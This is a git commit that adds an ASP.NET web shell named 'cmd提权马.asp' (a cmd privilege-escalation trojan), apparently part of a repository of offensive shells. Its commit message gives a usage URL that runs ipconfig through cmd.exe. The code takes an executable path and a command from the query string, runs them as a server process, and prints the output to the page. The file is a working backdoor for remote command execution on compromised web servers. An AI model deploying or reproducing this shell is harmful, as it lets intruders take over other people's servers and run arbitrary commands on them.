Create cmd提权马.asp

用法： http://192.168.1.108/moonshell.aspx?shell=C:\WINDOWS\system32\cmd.exe&sb=ipconfig from： zone.wooyun.org
2024-11-10 05:44:11 +00:00 · 2015-05-08 09:46:11 +08:00 · 2015-05-08 09:46:11 +08:00 · aa27e0c457
commit aa27e0c457
parent 73ec37f7e7
1 changed files with 68 additions and 0 deletions
--- a/asp/cmd提权马.asp
+++ b/asp/cmd提权马.asp
@ -0,0 +1,68 @@
+<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
+<%@ import Namespace="System.IO"%>
+<%@ import Namespace="System.Diagnostics"%>
+<%@ import Namespace="System.Data"%>
+<%@ import Namespace="System.Management"%>
+<%@ import Namespace="System.Data.OleDb"%>
+<%@ import Namespace="Microsoft.Win32"%>
+<%@ import Namespace="System.Net.Sockets" %>
+<%@ import Namespace="System.Net" %>
+<%@ import Namespace="System.Web.UI"%>
+<%@ import Namespace="System.Runtime.InteropServices"%>
+<%@ import Namespace="System.DirectoryServices"%>
+<%@ import Namespace="System.ServiceProcess"%>
+<%@ import Namespace="System.Text.RegularExpressions"%>
+<%@ Import Namespace="System.Threading"%>
+<%@ Import Namespace="System.Data.SqlClient"%>
+<%@ import Namespace="Microsoft.VisualBasic"%>
+<%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
+<%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
+<%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
+<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<script runat="server">
+protected void Page_load(object sender,EventArgs e)
+{
+  string ok = Request.QueryString["sb"];
+  string shell= Request.QueryString["shell"];
+  //www.moonsec.com moon
+  Response.Write(shell + ok );
+  Response.Write("<pre>");
+  Response.Write(GetCmd(ok,shell));
+  Response.Write("</pre>");
+}
+
+private string GetCmd(string cmd,string shell)
+{
+  string ok = string.Empty;
+   Process p = new Process();
+            p.StartInfo.FileName = shell;
+            p.StartInfo.UseShellExecute = false;
+            p.StartInfo.RedirectStandardInput = true;
+            p.StartInfo.RedirectStandardOutput = true;
+            p.StartInfo.RedirectStandardError = true;
+            p.StartInfo.CreateNoWindow = true;
+            string strOutput = null;
+            try
+            {
+                p.Start();
+                p.StandardInput.WriteLine(cmd);
+        Response.Write(cmd);
+                p.StandardInput.WriteLine("exit");
+                ok = p.StandardOutput.ReadToEnd();
+                p.WaitForExit();
+                p.Close();
+             }
+            catch (Exception ex)
+             {
+        Response.Write("<pre>");
+        Response.Write(ex);
+        Response.Write("/<pre>");
+                 }
+  return ok;
+}
+</script>
+</head>
+<body>
+</body>
+</html>